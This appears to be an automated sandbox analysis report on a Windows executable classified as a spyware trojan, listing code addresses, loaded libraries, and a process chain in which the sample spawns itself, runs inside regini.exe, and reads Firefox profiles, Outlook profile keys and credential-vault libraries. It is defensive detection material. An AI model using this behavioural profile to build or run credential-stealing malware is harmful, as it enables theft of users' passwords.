                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0C0011_2_014B0C00
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A0CF211_2_014A0CF2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01550CB511_2_01550CB5
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01524F4011_2_01524F40
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01552F3011_2_01552F30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F2F2811_2_014F2F28
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014D0F3011_2_014D0F30
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A2FC811_2_014A2FC8
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BCFE011_2_014BCFE0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0152EFA011_2_0152EFA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B0E5911_2_014B0E59
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156EE2611_2_0156EE26
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156EEDB11_2_0156EEDB
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156CE9311_2_0156CE93
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014C2E9011_2_014C2E90
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014E516C11_2_014E516C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149F17211_2_0149F172
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0157B16B11_2_0157B16B
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014BB1B011_2_014BB1B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B70C011_2_014B70C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155F0CC11_2_0155F0CC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156F0E011_2_0156F0E0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015670E911_2_015670E9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0149D34C11_2_0149D34C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156132D11_2_0156132D
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F739A11_2_014F739A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CB2C011_2_014CB2C0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015512ED11_2_015512ED
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B52A011_2_014B52A0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156757111_2_01567571
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154D5B011_2_0154D5B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014A146011_2_014A1460
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156F43F11_2_0156F43F
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156F7B011_2_0156F7B0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_015616CC11_2_015616CC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B995011_2_014B9950
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CB95011_2_014CB950
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154591011_2_01545910
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0151D80011_2_0151D800
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B38E011_2_014B38E0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FB7611_2_0156FB76
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01525BF011_2_01525BF0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014EDBF911_2_014EDBF9
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CFB8011_2_014CFB80
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01567A4611_2_01567A46
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FA4911_2_0156FA49
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01523A6C11_2_01523A6C
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0155DAC611_2_0155DAC6
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014F5AA011_2_014F5AA0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01551AA311_2_01551AA3
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0154DAAC11_2_0154DAAC
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B3D4011_2_014B3D40
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01561D5A11_2_01561D5A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01567D7311_2_01567D73
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014CFDC011_2_014CFDC0
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_01529C3211_2_01529C32
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FCF211_2_0156FCF2
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FF0911_2_0156FF09
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B1F9211_2_014B1F92
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_0156FFB111_2_0156FFB1
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exeCode function: 11_2_014B9EB011_2_014B9EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353A35213_2_0353A352
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035403E613_2_035403E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348E3F013_2_0348E3F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352027413_2_03520274
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035002C013_2_035002C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0350815813_2_03508158
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347010013_2_03470100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351A11813_2_0351A118
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035381CC13_2_035381CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035341A213_2_035341A2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035401AA13_2_035401AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351200013_2_03512000
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034A475013_2_034A4750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348077013_2_03480770
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347C7C013_2_0347C7C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349C6E013_2_0349C6E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348053513_2_03480535
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0354059113_2_03540591
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353244613_2_03532446
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352442013_2_03524420
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352E4F613_2_0352E4F6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353AB4013_2_0353AB40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03536BD713_2_03536BD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347EA8013_2_0347EA80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349696213_2_03496962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034829A013_2_034829A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0354A9A613_2_0354A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348A84013_2_0348A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348284013_2_03482840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034AE8F013_2_034AE8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034668B813_2_034668B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034F4F4013_2_034F4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03522F3013_2_03522F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034C2F2813_2_034C2F28
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034A0F3013_2_034A0F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03472FC813_2_03472FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348CFE013_2_0348CFE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034FEFA013_2_034FEFA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03480E5913_2_03480E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353EE2613_2_0353EE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353EEDB13_2_0353EEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353CE9313_2_0353CE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03492E9013_2_03492E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348AD0013_2_0348AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351CD1F13_2_0351CD1F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347ADE013_2_0347ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03498DBF13_2_03498DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03480C0013_2_03480C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03470CF213_2_03470CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03520CB513_2_03520CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0346D34C13_2_0346D34C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353132D13_2_0353132D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034C739A13_2_034C739A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349B2C013_2_0349B2C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035212ED13_2_035212ED
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034852A013_2_034852A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034B516C13_2_034B516C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0346F17213_2_0346F172
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0354B16B13_2_0354B16B
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348B1B013_2_0348B1B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034870C013_2_034870C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352F0CC13_2_0352F0CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353F0E013_2_0353F0E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035370E913_2_035370E9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353F7B013_2_0353F7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_035316CC13_2_035316CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353757113_2_03537571
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351D5B013_2_0351D5B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0347146013_2_03471460
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353F43F13_2_0353F43F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FB7613_2_0353FB76
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034BDBF913_2_034BDBF9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034F5BF013_2_034F5BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349FB8013_2_0349FB80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03537A4613_2_03537A46
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FA4913_2_0353FA49
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034F3A6C13_2_034F3A6C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0352DAC613_2_0352DAC6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034C5AA013_2_034C5AA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03521AA313_2_03521AA3
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351DAAC13_2_0351DAAC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0348995013_2_03489950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349B95013_2_0349B950
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0351591013_2_03515910
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034ED80013_2_034ED800
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034838E013_2_034838E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FF0913_2_0353FF09
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03481F9213_2_03481F92
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FFB113_2_0353FFB1
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03489EB013_2_03489EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03483D4013_2_03483D40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03531D5A13_2_03531D5A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_03537D7313_2_03537D73
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0349FDC013_2_0349FDC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_034F9C3213_2_034F9C32
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0353FCF213_2_0353FCF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0092204013_2_00922040
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091CF1013_2_0091CF10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091B11013_2_0091B110
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091D13013_2_0091D130
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091B25413_2_0091B254
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0091B26013_2_0091B260
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009256F013_2_009256F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009238F013_2_009238F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_009238EB13_2_009238EB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0093BCE013_2_0093BCE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327E27713_2_0327E277
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327E60C13_2_0327E60C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 13_2_0327D6D813_2_0327D6D8
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 034EEA12 appears 86 times
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 034C7E54 appears 102 times
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 0346B970 appears 277 times
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 034B5130 appears 58 times
                Source: C:\Windows\SysWOW64\regini.exe | Code function: String function: 034FF290 appears 105 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Code function: String function: 0151EA12 appears 86 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Code function: String function: 014F7E54 appears 102 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Code function: String function: 014E5130 appears 58 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Code function: String function: 0152F290 appears 105 times
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Code function: String function: 0149B970 appears 277 times
                Source: ZcshRk2lgh.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: ZcshRk2lgh.exe, 00000000.00000002.1451489861.0000000007270000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 00000000.00000000.1241813422.0000000000892000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameUHKn.exe4 vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 00000000.00000002.1451050484.0000000007150000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 00000000.00000002.1447440330.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 00000000.00000002.1446351787.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 0000000B.00000002.1633636676.000000000159D000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameREGINI.EXEj% vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe | Binary or memory string: OriginalFilenameUHKn.exe4 vs ZcshRk2lgh.exe
                Source: ZcshRk2lgh.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ZcshRk2lgh.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@10/10
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZcshRk2lgh.exe.log
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Mutant created: NULL
                Source: C:\Windows\SysWOW64\regini.exe | File created: C:\Users\user~1\AppData\Local\Temp\7046-nn1K
                Source: ZcshRk2lgh.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: regini.exe, 0000000D.00000002.3092940507.0000000002F57000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1827582447.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3092940507.0000000002F85000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1825314812.0000000002F57000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ZcshRk2lgh.exe | ReversingLabs: Detection: 63%
                Source: ZcshRk2lgh.exe | Virustotal: Detection: 71%
                Source: unknown | Process created: C:\Users\user\Desktop\ZcshRk2lgh.exe "C:\Users\user\Desktop\ZcshRk2lgh.exe"
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Process created: C:\Users\user\Desktop\ZcshRk2lgh.exe "C:\Users\user\Desktop\ZcshRk2lgh.exe"
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe | Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\regini.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe | Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\regini.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: ZcshRk2lgh.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ZcshRk2lgh.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EbjRcLZjak.exe, 0000000C.00000000.1551853417.0000000000A1E000.00000002.00000001.01000000.0000000D.sdmp, EbjRcLZjak.exe, 0000000E.00000002.3092131327.0000000000A1E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: ZcshRk2lgh.exe, 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1639130757.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1641179587.000000000329A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: ZcshRk2lgh.exe, ZcshRk2lgh.exe, 0000000B.00000002.1633636676.0000000001470000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 0000000D.00000002.3096790532.00000000035DE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000002.3096790532.0000000003440000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1639130757.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000D.00000003.1641179587.000000000329A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094328728.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: ZcshRk2lgh.exe, 0000000B.00000002.1633300230.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, EbjRcLZjak.exe, 0000000C.00000002.3094328728.00000000013B8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 0_2_02A54659 push edx; retn 0002h 0_2_02A5465A
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 0_2_02A5478F push esi; retn 0002h 0_2_02A54792
                Source: C:\Users\user\Desktop\ZcshRk2lgh.exe Code function: 0_2_02A5AB71 pushfd ; retn 0002h 0_2_02A5AB72
